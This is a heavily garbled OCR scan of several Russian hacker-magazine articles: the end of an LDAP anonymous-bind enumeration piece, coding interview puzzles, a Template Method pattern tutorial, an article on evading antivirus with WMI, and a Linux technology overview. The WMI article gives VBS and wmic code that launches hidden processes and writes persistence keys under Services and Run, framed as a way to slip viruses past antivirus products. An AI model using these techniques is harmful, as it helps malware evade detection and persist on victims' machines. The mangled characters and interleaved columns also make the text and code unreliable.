птар. Она сообщает, что на сканируемой машине открыт Іср-порт 
389, на котором расположился ЮАР-сервер. Слова «Апопутоиз 
ЬіпсІ ОК» как бы намекают нам, что он не простой, а с возмож- 
ностью анонимного подключения к ЮАР-каталогу, то есть без 
знания пользовательского йЫ и пароля. 

Мы этим непременно воспользуемся и попытаемся получить 
оттуда информацию, среди которой могут быть всякие интересные 
штуки типа Іодіп:ЬазЬ, но в общем случае там может находиться что 
угодно. Для этого существуют специальные программы. 

1. Ісіартіпег. Его синтаксис: 



а = Кеерег() 


Ісіартіпег -Ь <ір адрео <опции> 


Ь = Кеерег() 


-р [рогі]: по умолчанию равен 389 


■Рог і іп Кеерег. Іізі іпзіапсез(): 


-В [ЬіпсІ] : имя пользователя 


ргіпі і 


-м [раззмогсі]: пароль 


В функции іпіі , которая выполняется при создании экзем- 

пляра класса, к списку іпзіапсез добавляется ссылка на наш све- 
жесозданный объект, а функция ІізЫпзІапсез возвращает список, 
который по умолчанию поддерживает итерационный протокол. 
Вывод программы будет примерно такой: 

< таіп .Кеерег іпзіапсе аі ѲхЬ72аесІ4с> 


-Ь [Ьазе зеагсЬ] : поиск по пользователю, группе 

-сі [сіитр аіі] : получить всю информацию 

2. Іита. Утилита с графическим интерфейсом, весьма проста в 
освоении. 

3. Ир.Ещеодна графическаяутилита, на этот раз от МісгозоЙ. 

4. орепісіар. Набор консольныхутилитдля взаимодействия с 
ЮАР-каталогами. Конкретно в нашем случае нужно использо- 
вать ІсІарзеагсЬ. Синтаксис при водить здесь не буду, он очень уж 
страшный. 


< таіп .Кеерег іпзіапсе аі: ѲхЬ72аее2с> 






УСЛОВИЕ 




Что это и что с этим можно сделать? 

389/іср ореп Ісіар (Апопѵтоиз ЬіпсІ ОК) 


Как ни странно, во всеми любимом Меіазріоіі до сих пор нет 
модуля для дампа ЮАР-каталога, хотя реквест о такой функции 
был подан около двух лет назад. □С 






В СЛЕДУЮЩЕМ ВЫПУСКЕ 


1. Чтобудетвыведено в результате исполнения программы? Почему? 


сіазз Ваг: Роо 






{ 


сіазз А: 




риЬІіс : 


сІе-Р іпіі (зеіі., пате): 


ВагРіпі і) 1 і=пеш сЬаг[і~1; } 


зеі-р.пате = пате 


~Ваг() 1 сіеіеіе і: } 


сІе-Р сіеі (зеІ-Р): 


ргіѵаіе: 


ргіпі 


зеі-р.пате. 


сЬаг* і: 


}; 


аа = ГАРбігРі)) -Рог і іп гапееРЗ)! 


-Рог а іп аа 




ѵоісі таіп() 


сіеі а 




{ 


Роо* і=пеи/ Роо(100): 


ргіпі ’сіопе 


■ 


Роо* Ь=пеи/ Ваг(200): 


-О 

* 

II 

ч- 

* 


# ... 




сіеіеіе -Р; 






сіеіеіе Ь; 


2. Перечисли всепроблемы, которыеты видишь в данном коде: 


} 


сіазз Роо 




3. У тебя есть файл (например, ассезз-логѵѵеЬ-сервера) очень большого 






размера. Пользователи часто запрашивают из него строчки по их 


риЬІіс : 




номеру. Нужно реализоватьфункцию, которая бы возвращала строчку 


РооРіпі і) { і=пем іп - ГІІі } 


с произвольным номером за время, независимое от номера строчки и 


~Роо() { 


сіеіеіе і; } 


размера файла. 


ргіѵаіе: 




іпі* і: 




4. Напиши функцию сортировки массива чисел. Если знаешь несколько 


}; 




способов- используй наиболее быстрый из известных тебе алгорит- 






мов. 
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РЕКЛАМА 




♦ 




ОТБОРНЫЕ ПРОДУКТЫ 

СО ВСЕГО МИРА* 



Ш Мы зноем, где с мире пойти самые лучшие продукты. 

Вы знаете, что можете но йпінк родом» гкрдм^ксчіТАЗН 







сіееопіз (сІееопізОдфаіІ.сот) 



[Ц ИНКАПСУЛЯЦИЯ 
АЛГОРИТМОВ 




Алгоритмы - это, пожалуй, самое важное 
в мире кодинга. Любая программа реализует 
какую-то последовательность действий 
и в большинстве случаев не одну. В ООП 
алгоритмы имеют такую же значимость, как 
и в любом другом виде кодинга, поэтому гуру 
объектов и классов придумали специальный 
паттерн, который позволяет сделать 
использование алгоритмов более легким, 
понятным и гибким. 



прошлой статье про паттерны «Фасад» и «Адаптер» мы 
представили, что работаем над парсером, который со- 
бирает инфу с определенных сайтов. Сегодня мы будем 
продолжать нашу воображаемую работу, что позволит нам 
вникнуть в суть другого паттерна объектно-ориентированного 
программирования под названием «Шаблонный метод». 

Конкретизируем область применения нашей мегатулзы: 
она будет сканить всяческие доски объявлений и форумы. Как 
известно, ЫтІ-код у разных форумных движков разный, но 
структура построения интерфейса схожа. На одной странице 
отображается строго заданное количество топиков - скажем, 
тридцать. Если тем в разделе форума больше, чем тридцать, то 
пользователю показывается навигационный элемент, — напри- 
мер, ссылка на следующую страницу или пронумерованный спи- 
сок этих страниц. Таким образом, наш парсер должен не только 
проходить по первой странице, но и уметь бегать по соседним, 
также содержащим нужную нам информацию. 

Вырисовывается вполне конкретный алгоритм действий: 
парсер получает адрес страницы, скачивает ее, выдирает 
нужные топики/объявления, ищет адрес следующей страни- 
цы и если его находит, то начинает все сначала. В противном 
случае, если мы не нашли ссылку на следующую страницу, 
парсер заканчивает свою работу. В коде все это будет выглядеть 
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Алгоритм работы парсера 

с Іа 5 5 Рагзег 

X 

// .. 



риЬІіс : 



ѵоісі раг5еРа§е(5І=гіп§ игі) 



X 



ыііііе (и гі != " " ) 



X 



// получаем нужные данные со страницы 
§е1:ТорісТех1:( ) ; 

// ищем ссылку на следующую страницу 
игі = §еіІ\Іехі:ІІг1( ) ; 



} 



ргіѵаіе : 



ѵоісі §е1=ТорісТех1=(^ 



X 



_х 



5І;гіп§ §е1:ІМех1:Цгір 

^Х 



х_ 



У нас есть класс Рагзег, который имеет основной метод 
рагзеРадеО. Этот метод будут вызывать клиенты парсера. 

Сам рагзеРадеО реализует алгоритм, описанный выше. Для 
удобства восприятия мы разбили код метода на функции, такие 
как деІІМехШгН) и деНорісТехД). Некоторые могут сказать, что 
лишние вызовы замедляют работу программы, но, во-первых, 
это всего лишь псевдокод (грубо говоря, блок-схема буквами), 
а во-вторых, такое разбиение нам пригодится в будущем. 



ПАРСИМ НЕСКОЛЬКО САИТОВ 



Наш парсер работает, и все вроде хорошо, но мы не учли одну 
маленькую деталь — сайт для сбора информации у нас не один, 
их несколько. Это нас, правда, не сильно расстроило, и мы при- 
нялись ваять еще один класс. 

Так как алгоритм, описанный нами ранее, остался прежним, 
а изменились лишь детали реализации, — например, получение 
ссылки на следующую страницу, — то код нашего нового класса 
будет очень похож на тот, что был в предыдущем. 






■ Паттерн «Шаблонный метод» ■ 

■ Ш 



X. 

ЛйЗлтсіЫпвО: 

Я™ 

рлтйморегайапц); 

РптШѵеОрегаІюііО- 

// не 




Как видишь, у нас есть все тот же метод рагзеРадеП, который 
выполняет основную работу. Так как мы знаем, что такое на- 
следование, полиморфизм и прочее, то решаем все это круто 
оптимизировать, создав общего родителя для двух классов пар- 
серов. Теперь вся наша конструкция выглядит примерно так: 

Иерархия классов парсеров 

с Іа б 5 ВазеРагзег 




Парсер для еще одного сайта 

с Іа 5 5 Рагзег5і1:е2 

X 

// .. 

риЬІіс : 

ѵоісі р аг5еРаее(5І=гіп^ игі) 

{ 

мііііе (игі != " " ) 

{ 

// получаем нужные данные со страницы 

§е1:Оа1:аОпРа§е( ) ; 



// ищем ссылку на следующую страницу 

игі = §еіІ\Іех1:ІІг1( ) ; 

} 

} 



ргіѵаіе: 

// метод по назначению идентичен 
Рагзег: : §еіТорісТех1: 



// •• 

риЬІіс : 

ѵігіиаі ѵоісі рагзеРа^е(з1:гіп^ игі) = 0; 

> 



с Іа 5 5 РагзегБііеІ : риЬІіс ВазеРагзег 

X 

риЬІіс : 

ѵоісі рагзеРа§е(з1:гіп§ игі) 

— { — 

шЬіІе ( игі != " ") 

{ 

// получаем нужные данные со страницы 

%еіТорісТех1:() : 



// ищем ссылку на следующую страницу 
игі = §еіІ\Іех1:ІІг1( ) ; 

> 

} 

ргіѵаіе : 









Пример кода паттерна «Шаблонный метод» 



ѵоісі ^е1=ТорісТех1=П 
{ 

// .. 

} 

з1ігіп§ §е1іІ\Іех1іІІг1( ) 
{ 

// •• 

} 

ь_ 



с Іа 5 5 Ра гзег5і1іе 2 : риЬІіс ВазеРагз ег 

риЬІіс : 

ѵоісі рагзеРаее(з1ігіп^ игі) 

{ 

(игі != "") 

// получаем нужные данные со страницы 

§еіТорісТех1:( ) ; 



// ищем ссылку на следующую страницу 
игі = §еіІ\Іех1іІІг1( ) ; 

} 

} 

ргіѵаіе: 

ѵоісі Ег еіТорісТехІіО 
{ 

// •• 

} 

з1ігіп§ §е1іІ\Іех1іІІг1( ) 

{ 

// •• 

} 



Мы сделали рагзеРаде базовым методом, но переложили 
реализацию на потомков, пометив его как абстрактный. Такой 
ход, конечно, внес некоторый порядок в нашу программу, но 
осталась проблема дублирования кода. Реализация процесса 
сбора информации очень похожа, а учитывая то, что мы ввели 
такие методы как деІІМехШгК) и тому подобные, мы получаем 
вообще идентичный набор символов в теле рагзеРадеО. 

ПАТТЕРН «ШАБЛОННЫЙ МЕТОД» 

Паттерн «Шаблонный метод» призван икапсулировать в себе 
выполнение некоторого алгоритма. Мы уже частично реализо- 
вали его, выделив базовый класс для наших парсеров. Следую- 
щим шагом будет непосредственно инкапсуляция. Для этого 
мы перенесем код метода рагзеРадеО из дочерних классов 
Ра гзегБііеІ и Рагзег5і1е2 в родительский ВазеРагзег. Благода- 
ря тому, что мы уже выделили в отдельные функции некоторые 
части алгоритма (такие как получение текста объявления или 
поиск ссылки на следующую страницу форума), то мы немного 
упростили процесс применения паттерна. Если бы изначально 
весь код рагзеРаде был построен без вызова дополнительных 
методов, то нам все равно пришлось бы их писать. 

Паттерн «Шаблонный метод» 

сіазз ВазеРагзег 

{ 

// .. 

риЬІіс : 

ѵоісі рагзеРа^еГзігіпд игі) 

{ 

шЬіІе ( игі != "") 

{ 

// получаем нужные данные со страницы 

§еіТодісТех1і( ) ; 



// ищем ссылку на следующую страницу 

игі = §е1іІ\Іех1іІІг1( ) г; 

} 

} 

ргоііесііесі : 

// эти части алгоритма должны определить наследники 
ѵігіиаі ѵоісі §еіТорісТехі( ) = 0; 
ѵігіиаі зіігі п^ ^еИМехтг Ю = 0; 

} 



сіазз РагзегЗііеІ : риЬІіс ВазеРагзег 

і_ 

риЬІіс : 

// Мы не должны изменять метод рагзеРаде. 

// так как базовый класс предоставил нам специальные 

// функции, которые позволяют реализовать 

// спе циф ичны еча сти алгор итма 

//ѵоісі рагз е Р а § е ( зіігіпе игЛ ; 

ргоііесііесі : 

// эти два метода переопределяются в сѵбклассе 

// для реализации специфичного для данного парсера 
кода 

ѵоісі ^ еіТорісТехІіО 

// 

} 

5ігіп§ §е1іІ\Іех1іІІг1( ) 

{ 

// •• 

} 

3 ^ 
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// структура класса идентична структуре РагзегБіІіеІ 

ь_ 



Если взглянуть на код иерархии классов парсеров, к которому при- 
менен наш паттерн, то можно увидеть, что в базовый класс также вы- 
несены методы деІІЧехШгК) и деіТорісТехД). По умолчанию они имеют 
пустую реализацию, поэтому дочерние классы должны определить, 
какой код там будет. Но в общем случае «Шаблонный метод» допуска- 
ет некий базовый функционал в подобных функциях, таким образом 
конкретные реализации парсера могут воспользоваться уже готовым 
кодом. 

Теперь контроль за исполнением алгоритма сосредоточен в ру- 
ках одного единственного класса — ВазеРагзег. Его наследники 
могут лишь менять детали реализации этого алгоритма, которые 
строго определены в базовом классе. Что нам это дает? Ну, пред- 
ставим, что парсить нам надо не один-два сайта, а сразу сотню. И в 
какой-то момент мы решаем заменить итерационный алгоритм на 
рекурсивный. С паттерном «Шаблонный метод» нам достаточно из- 
менить код всего в одном месте — ВазеРагзепірагзеРадеЦ. Если бы 
ответственность за реализацию основной последовательности дей- 
ствий лежала на отдельных классах-парсерах, то нам бы пришлось 
перелопатить тонны исходников, прежде чем получим желаемый 
результат. 



остановится преждевременно. Метод должен определяться 
как виртуальный, чтобы в функции алгоритма базового класса 
вызывались методы, переопределяемые в дочерних (если они 
переопределяются]. По умолчанию перехватчик возвращает 
Еаізе, тем самым никак не влияя на количество итераций. Но 
потомки ВазеРагзег могут переопределить код перехватчика 
и тем самым повлиять на ход алгоритма. 

Контроль количества обработанных страниц 

сіазз Раг зегБіІіе І: риЬІіс ВазеРагз ег 

{ 

// •• 



ргоііесііесі : 

// используем перехватчик по умолчанию. 
// то есть не вмешиваемся в работу цикла 
// Ьооі БІіорНоокП; 

} 



сіазз Рагзег5і1іе2: риЬІіс ВазеРагзег 



// .. 





ПЕРЕХВАТЧИКИ 

Жесткий контроль алгоритма — это хорошо, но что если нам нужно 
пространство для маневра? Если в последовательности действий 
предусмотрено некоторое ветвление, на которое влияют детали реа- 
лизации, то нам потребуются методы-перехватчики (хуки). 

Допустим, класс Ра гзегБіІеІ должен просматривать все страницы 
форума, а вот Рагзег5іІе2 всего-навсего первые три. Получается, что 
каждая конкретная реализация парсера влияет на одно из фундамен- 
тальных свойств алгоритма — работу цикла. Очевидно, что нам надо 
как-то контролировать количество итераций, чтобы Рагзег5іІе2 оста- 
новился в нужный момент. Но невозможность изменения поведения 
рагзеРаде не дает нам это сделать. 

Хуки же позволяют влиять на ход алгоритма и при этом сохранять 
контроль над ним в базовом классе. Немного изменив код метода 
рагзеРадеО мы позволим потомкам преждевременно останавливать 
цикл ѵѵЬіІе. Давай взглянем на код. 



ргіѵаііе: 

іпі соштЕ; 



ргоііесііесі : 

// переопределяем перехватчик 
Ьооі зІіо рНоокП 
{ 



і-р ( соипі > 3) 
геііигп Іігие; 

еізе 

геііигп -Раізе; 



// тут увеличиваем счетчик отпарсенных страниц 
ѵоісі §е1іТо[эісТех1і( ) 

{ 




Перехватчик в «Шаблонном методе» 

сіазз ВазеРаг зег 

і_ 

// •• 
риЬІіс : 

ѵоісі рагзеРа§е(з1ігіп§ игі) 

{ 

шЬіІе (игі != " ") 

{ 



// с помощью хука можно досрочно завершить цикл 
і-р (зІіорНоокП ) 

Ьгеак; 



// ... 



ргоііесііесі : 

// перехватчик 

ѵігіиаі Ьооі з1іорНоок() {геііигп -Раізе; 

// .. 



// ... 

соип1і++; 

} 



Мы видим, что Ра гзеЗііеІ не перегружает хук, и рагзеРаде 
пользуется дефолтным вариантом. А вот Рагзе5іІе2 ведет 
подсчет количества обработанных страниц, и когда их число 
достигает трех, перехватчик останавливает цикл. 

Если бы в паттерне «Шаблонный метод» не было хуков, нам 
пришлось бы переписывать реализацию рагзеРаде для каждого 
отдельного класса парсера, вследствие чего пропал бы прак- 
тически весь смысл его использования, так как мы потеряли бы 
контроль над алгоритмом. 

ЗАКЛЮЧЕНИЕ 

На практике паттерн «Шаблонный метод» имеет множество 
вариаций. Многие из программистов сами того не зная реализо- 
вывали этот паттерн в том или ином виде. Но основной принцип 
остается неизменным: «Шаблонный метод» определяет «ске- 
лет» алгоритма в методе, оставляя определение реализации 
некоторых шагов субклассам. Субклассы же, в свою очередь, 
могут переопределять некоторые части алгоритма без измене- 
ния его структуры. □С 





От метода зіор Н оок() зависит, будет ли цикл работать дальше или 





кодинг 



Александр Эккерт Ыаппіс.тапйдтаіІ.сот) 



ѴѵМІ: 

обход 

защит 

НЕОЖИДАННЫЙ ВЗГЛЯД 
НА ПРИВЫЧНЫЕ ВЕЩИ 



Как это часто бывает, самое интересное 
и увлекательное просто валяется 
под ногами. Сегодня мы рассмотрим 
возможность обхода проактивных защит при 
помощи средств, входящих в стандартную 
комплектацию ОС ѴѴіпсІоѵѵз. 




Невидимый Ыоіерасі 




оговорим о ѴѴіпсІоѵѵз Мападетепі Іпзігштепіаііоп (ѴѴМІ), 
но с несколько непривычной точки зрения. Собственно, ][ 
уже писал на эту тему — как можно приспособить средства 
ѴѴМІ для своих нужд ( хакер.ги/тадагіпе/ха/ІІ 8/030/1 .азр ). Будем 
считать эту статью продолжением написанного ранее. 

ЛОМАЯ БРОНЬ ПРОАКТИВНЫХ ЗАЩИТ 

Насколько я знаю, скрипты ѴѴМІ использует в своей работе 
лишь один человек из десяти. И это в лучшем случае. А ведь 
зря! Это удобное и мощное средство. Ну и что тут такого 
интересного, — скажешь ты, — По большей части ѴѴМІ пред- 
назначен для сбора информации о компьютере и выполнения 
нехитрых приемов администрирования. Я бы с тобой согла- 
сился, если бы не два «но», которые наглядно демонстрируют, 
как можно использовать всю мощь ѴѴМІ для создания кумуля- 
тивных зарядов, пробивающих бронь антивирусов и проактив- 
ных защит. 

Первое — это возможность создания нужного тебе процесса. 
Каким образом? 

Сопзі: 5ІлІ_І\ІОКМАІ_ = 1 
Сопзѣ БІлМНЮЕ = 0 
5І:гСотри1:ег = " . " 
зІтСоттапсІ = "поііерасі.ехе" 




Беі оЬд'ІлІМІБегѵісе = СеѣОЬдесІіС'ыіпт^тІіз : " 

& м {ітрегзопа1:іопІ_еѵе1=ітрег50па1:е} ! \\" 
& зІтСотриІіег & "Хгоо-ЕХсз.гтгё"') 



Бе'Ь оЬд'БІіагІіир = оЬдЫМІБегѵісе.6е1:("Міп32_Ргосе555'ЬагЕир") 
Бе* оЬдСопб§ = оЬд51:аг1:ир.5раыпІп5І:апсе_ 
оЬд'Сопб§.5ІіоыІлІіпсІоы^ 5ІлІ_І\І(ЖМАІ_ 



Беі: оЬіРгосезз = оЬіЫМІ5егѵісе.6е1:("1лІіп32 Ргосезз") 
іпІіКеІіигп = оЬіРгосезз.СгеаІіе 

(зІігСоттапсІ. ІМиІІ, оЬд'Сопб§. іпІіРгосеззІР) 



100 
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ѴѴМІ: обход защит 




Беспалевная запись в реестр 

Обрати внимание на параметр БЬоѵѵѴѴіпсІоѵѵ: если хочешь 
скрыть окно твоего приложения, то используй параметр 5ѴѴ_ 

НЮЕ = 0. На скрине ты можешь видеть, как в списке процессов 
Іазктападег'а болтается запущенный таким образом «блокнот», 
однако на панели задач ничего нет! Второе — это запись в реестр! 
Да-да, используя ѵЬз-скрипты, можно легко писать в реестр! 

С0П5* НКЕУ_ШСАІ._МАСНІ І\ІЕ = &Н80Ѳ0Ѳ002 
5І:гСотри1:ег = " . " 

Беі оЬіКе^=6е1=0Ьіес1=( 

"ыіпш^шііб : {ітрег5опа1:іопІеѵе1=ітрег50па1:е} ! \\" & 
БІігСотриІіеп & "\гоо1і\сІе-Раи11::51:сІКе§Ргоѵ") 



5І:гКеуРа1:Іі = "БУБТЕМХХСиппепІіСопІігоІБеІіХХБепѵісеБХХМуБегѵісе" 
оЬд'Ке§ . СгеаѣеКеу Н КЕУ_ІОСАІ._МАСНІІ \ІЕ . Б^гКеѵРа^Іі 
5І:гѴа1иеІ\Іате = "ОеБегіІііоп" 

5І:гѴа1ие = "ІМеіл/ ѴігиБ Бегѵісе" 
оЬдКе§.5е1:51:гіп§Ѵа1ие _ 

НКЕ У_І.ОСА І. _М АСНІІ\ІЕ . 5І=гКе уР а1=Іі . БІг гѴ аІиеІМа те . БІі гѴ аІие 

В данном случае ветка реестра НКЕУ_І_ОСАІ__МАСНІІ\ІЕ\ 
БУБТЕМХСиггепіСопІгоІБеіХЗегѵісезХ используется для старта 
системных служб и сервисов ѴѴіпсіоѵѵб, в том числе загрузки драй- 
веров. Правда, тут есть одно ограничение, о котором ты, думаю, 
слышал. Данный метод пройдет для ѴѴіпсіоѵѵб ХР, но не для «се- 
мерки», — в ѴѴіп7 писать в ветку НКЕУ_І_ОСАІ__МАСНІІ\ІЕ не дадут. 
Однако есть возможность использования аналогичного скрипта 
для записи в НКЕУ_СІІРПЕІМТ_ІІ5ЕП. Отмечу сразу, что указанные 
способы пробивают не все, но большинство антивирусов. К приме- 
ру, описанные ниже техники тестировались мной около года назад, 
и из десяти антивирусов со стандартными настройками безопас- 
ности лишь один заблокировал создание процесса и запись в чув- 
ствительные ветки реестра (в частности, НКЕѴ_І_ОСАІ__МАСНІМЕ\ 
50РТѴѴАПЕ\Місго5ОЙ\ѴѴіпбоѵѵ5\СиггепіѴег5Іоп\Рііп), заложенные 
в ѵЬз-скрипте. Все остальные — как бы сказать помягче — про- 
шляпили выполнение потенциально опасного кода. 

ТЕ ЖЕ ЯЙЦА, ВИД СБОКУ 

Для исполнения трюков необязательно использовать ѴВ- и ^ѵа- 
скрипты. Существует вполне адекватная командная строка, 
которая пустит нас в оболочку ѴѴМІ (ѴѴМІ соттапб-Ппе). Для этого 
нужно выполнить команду «ѵѵтіс». Суть командной строки ѴѴМІ — 
выполнение того же скрипта, как если бы он был оформлен в виде 
ѴВ5- или 35-кода. 

Командная строка ѴѴМІ включает серию «предварительно за- 
готовленных» ѴѴМІ-запросов, известных как псевдонимы. Ты смо- 
жешь просмотреть содержание любого псевдонима, просто набрав 
в командной строке «ѴѴМІС», а следом — имя этого псевдонима. 
Например «ѴѴМІС (ЭРЕ» выведет список всех «заплаток» и пакетов 
обновлений, установленных на компьютере. Полный список всех 



псевдонимов может быть выведен с помощью набора команды 
«ѴѴМІС/?». Имеющиеся в нашем распоряжении псевдонимы пред- 
ставляют основной кругзадач администраторов и информацию, 
в которой они могут быть заинтересованы. Однако это еще не 
все, что можно сделать, используя ѴѴМІС. ѴѴМІС могут быть также 
использованы для прямых запросов к ѴѴМІ-схеме. Это дасттебе 
доступ ко всем имеющимся классам, а не только к тем, которые 
предоставляются с помощью псевдонимов. РІапример, чтобы 
создать процесс, достаточно выполнить в открывшейся командной 
строке ргосезз саІІ сгеаіе "саіс.ехе". Из известных аверов на такое 
создание процесса никто даже ухом не повел. А что, если таким об- 
разом запустить на исполнение вирус? Ну и последний булыжник 
в огород красивых «решений по 100% безопасности вашего ком- 
пьютера», — смотрим, как легко «брюки превращаются в шорты»: 

м тіс /ІМатеБрасе: ХХгооІіХсІе-РаиІІ: Сіэбб БІісІКе^Ргоѵ СаІІ Сге- 
аѣеКеу ІіОе-РКеу= ,, &Н80000002" ББиЬКеуЫате^'БОРТЫАКЕХХМісго- 
Бо-РІіХХІлІіпсІоыБХХСиппепІіѴепБІопХХ-Рис^аѵепБ" 

Запусти этот код на выполнение, посмотри на результат, а потом 
— на «лучшее решение для защиты», которое обеспечивает так 
называемую «безопасность» твоего компьютера, поплачь и иди 
выкидывать его на помойку. Если запуск ѵЬ-скриптов аверами 
худо-бедно палится (хотя и далеко не всеми), то в данном случае ни 
один из десяти протестированных мной антивирусов (а тестировал 
я только самые популярные) не смог отловить такую хитропопую 
запись в чувствительные ветки реестра. По-моему, уже не смешно. 

ЗАКЛЮЧЕНИЕ 

Итак, подведем итоги. Заметь, я не рассматриваю в данной статье 
какие-то уязвимости операционной системы, позволяющие вы- 
полнить зловредный код на целевой машине, которые являются 
недоглядом разработчиков ѴѴіпсІоѵѵз, — их и так хватает. Сегодня 
мы увидели, что можно запросто, используя только законные сред- 
ства операционной системы, выбираться из тех клеток, которые 
ставят «честным хакерам» разработчики антивирусов и проактив- 
ных защит. И-Л 



ОѴЫАМІСѴѴРАРРЕКХ 

В контексте данной статьи не могу не упомянуть о чуде под 
названием ОупатісѴѴгаррегХ (БсгірЬсосііпд.сот/сіупѵѵгарх.МтІ). 

Она не имеет прямого отношения к ѴѴМІ, но мне кажется, что 
тебе нужно о ней знать. Это АсІіѵеХ-компонент (СОМ-сервер), 
который предоставляет возможность вызывать из яваскриптов 
и ѴВ-скриптов функции, экспортируемые сІІІ-библиотеками, — 
в частности, функции ѴѴіпсіоѵѵб АРІ. 

Вызвать напрямую, скажем, функцию СгеаІеѴѴіпсІоѵѵЕх из ѵЬ — 
нельзя, интерфейс под это не заточен. И вот автор ОупатісѴѴгаррегХ 
— замечательный программист Юрий Попов — озадачился этой 
проблемой и успешно ее решил. 

С помощью процедуры регистрации СОМ-серверов в системе: 
м гед 5 ѵг 32 .ехе сІупѵѵгарх.сШ", устанавливаем ОупатісѴѴгаррегХ 
в систему и получаем крайне очаровательную возможность 
вызывать ѴѴіпАРІ-функции из ѴВ/Эаѵа-скриптов! 

Делается это примерно так: 

Беѣ ОХ ^СгеаІіеОЬдесІіС'ОупатісІлІпаррепХ" ) 

0Х.Ке§І5І:ег "кегпе132" Д _"Веер , ^ 1 _ "і=ии" 

ОХ. Веер 800, 1000 

Как можно ее применить — решать тебе, но согласись, что довольно 
удобная штука! 
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ІЖІХОШ 



Юрий «Асіері» Видинеев Ыерідйдтаіі.сопп) 




Новые 
времена 

требуют 

перемен 



Мир ОрепЗоигсе привлекает 
своей динамикой. 

В нем постоянно что-то 
происходит: системы, 
концепции, стандарты 
сменяют друг друга 
с бешеной скоростью, 
причем с каждым годом 
темп только увеличивается. 
Об основных актуальных 
направлениях развития 
свободных решений мы 
сегодня и поговорим. 





ОПИСАНИЕ ТЕХНОЛОГИЙ 
БЛИЖАЙШЕГО БУДУЩЕГО, 
ИДУЩИХ НА СМЕНУ 
ТЕХНОЛОГИЯМ ДНЯ 
ВЧЕРАШНЕГО 
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Новые времена требуют перемен 
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Ш - : ЬаіМ 



ІзтосІ — теперь просто ссылка на ктосі 



X: РЕУОИЛІОИ 



ѴѴауІапсІ — это протокол и его демонстрацион- 
ная реализация (на С, объем кода составляет 
менее 10 000 строк, лицензия — МІТ), идущий 
на смену нимногони мало Х-серверу! Основ- 
ная причина — Хустарел: его архитектура на 
сегодняшний день неактуальна, а код сложно 
поддерживать. 

Главная особенность ѴѴауІапсІ — объеди- 
нение в один элемент (ѴѴауІапсІ Сотрозііог 
или ѴѴауІапсІ Бегѵег) того, что в архитектуре X 
было, собственно, Х-сервером, композитором 
и менеджером окон. ѴѴауІапсІ Сотрозііог имеет 
пока единственную реализацию — ѴѴезІоп, 
которую создают разработчики протокола 
ѴѴауІапсІ. В недалеком будущем ожидается под- 
держка ѴѴауІапсІ у Сотріг и Кѵѵіп. При этом все 
операции по рендерингу окна будет выполнять 
ѴѴауІапсІ СІіепІ (то есть само приложение). Это 
позволит избавиться от ошибок рендеринга 
изображений, возникающих в X Бегѵег, а также 
уменьшить время отрисовки изменений. Еще 
одним плюсом является возможность работы от 
имени непривилегированного пользователя. 

Так как ѴѴауІапсІ завязан на такие штуки, 
как Оігесі Репбегіпд ШРІ), КМ5 (КегпеІ Мосіе 
БеШпд) и СЕМ (СгарЫсз Ехесиііоп Мападег), 
то бегать он может только поверх Ыпих и пока 
только со свободными драйверами для видео- 
карт Іпіеі, Рабеоп и ІМоиѵеаіі. 

Одной из часто критикуемых вещей в но- 
вом протоколе является отсутствие сетевой 
подсистемы (наподобие той, что с незапамят- 
ных времен была в XII). Эта критика не совсем 
оправдана — просто сам протокол ѴѴауІапсІ 
не включает в себя описания реализации 
сетевой подсистемы, но это не мешает реа- 
лизовать сетевое взаимодействие на уровне 
композитора. 

Поддержка (правда, пока весьма ограни- 
ченная) ѴѴауІапсІ уже есть во многих проектах: 

01, 6ТК, ЕРІ_ (ЕпІідЫептепІ Роипсіаііоп ЫЬгагу), 
СІіШег, БОЕ. Приложения, не использующие 
ни один из этих тулкитов (а таких не очень 
много), тоже поддерживаются — достаточно 
просто запустить Х.Огд-сервер как ѴѴауІапб- 



клиент (оверхед при этом обещает быть не 
очень большим). 

Не то чтобы ѴѴауІапсІ совсем новый проект 
(разработка ведется с 2008 года), но велика 
вероятность, что через пару-тройку лет он ока- 
жется во всех десктопных и мобильных Линук- 
сах. Благо, первый стабильный релиз 1.0 уже не 
за горами — возможно даже, что он увидит свет 
до момента выхода данного номера в печать. 



КМСЮ: ЕѴОШТІОЫ 



В конце прошлого года несколько известных 
разработчиков из РесІНаІ написали открытое 
письмо, в котором перечислили возможности, 
которые они хотели бы реализовать в ядре 
Ыпих и низкоуровневых утилитах, если бы у них 
было на это время: .Прошло не- 

сколько месяцев, и одна из «хотелок» увидела 
свет под именем ктосі. Представляет собой 
замену тосІиІе-іпіЫооІз (пакета, содержащего 
утилиты для управления модулями ядра: ІзтосІ, 
тобргоЬе, гттосі и другие), основное преиму- 
щество — использование библиотеки ІіЬктосІ, 
которая также может использоваться в любых 
приложениях (лицензия — Е6РЕѵ2 и старше). 
Первое подобное приложение — исіеѵ. Раньше 
при загрузке несколько сотен раз вызывалась 
внешняя утилита тобргоЬе (и при этом не всег- 
да успешно — могло оказаться, что модуль уже 
загружен), а использование ІіЬктосІ помогло 
существенно снизить накладные расходы на 
чтение файла конфигурации и построение 
списка доступных модулей при каждом вызове. 
Уменьшение времени загрузки при переходе 
на новый исіеѵ заметно даже на глаз. Кроме 
исіеѵ, с ктосі возможно скоро научится работать 
зузіетсі. АгсЬ Ыпих, как обычно, впереди пла- 
неты всей и с января этого года уже использует 
ктосі версии 4. В экспериментальном репозито- 
рии йеЫап также присутствует ктосі версии 3. 



9У5Ю6: 0Е5ТРІІСТІ0М 



Бузіетсі — система инициализации (замена 
для БузѴіпіІ и Іірзіагі), которая используется 
во все большем количестве дистрибутивов. Но 
речь пойдет не о ней, а о модуле под названием 



-ІоигпаІ, который появился в релизе зузіетсі 
38. Модуль предоставляет функциональность, 
аналогичную зузіод, но с некоторыми особен- 
ностями. Для начала разработчики отмечают 
у старичка зузіод, которому уже около тридца- 
ти лет, целый список недостатков. 

• При приеме сообщений в зузіод отсутствует 
какая-либо аутентификация отправителя: 
если процесс представится, что он тузді на 
порту 10000, то таки будетзаписано. 

• Отсутствуетутвержденный формат, в кото- 
ром л огируются данные. Это сильно затруд- 
няетпарсинглогов и вынуждаетизменять 
скрипты парсинга при любых изменениях 
вывода в лог в программах. 

• В записях отсутствует информация о часо- 
вом поясе. 

• Бузіод — л ишь одна из многих систем жур- 
налирования, работающих в Ыпих: есть еще 
иІтр/ѵѵІтр/Ытр, ІазІІод, логи ядра, атакже 
логи всевозможных приложений. Когда логи 
так раскиданы по системе, сложно искать 
связи между событиями в них. 

• Так как в логах отсутствует какая-либо 
индексация, их чтение очень неэффективно 
(при поиске приходится перебирать все 
строчки). 

• Сетевой протокол зузіод проств реализа- 
ции, но очень ограничен: в частности, никак 
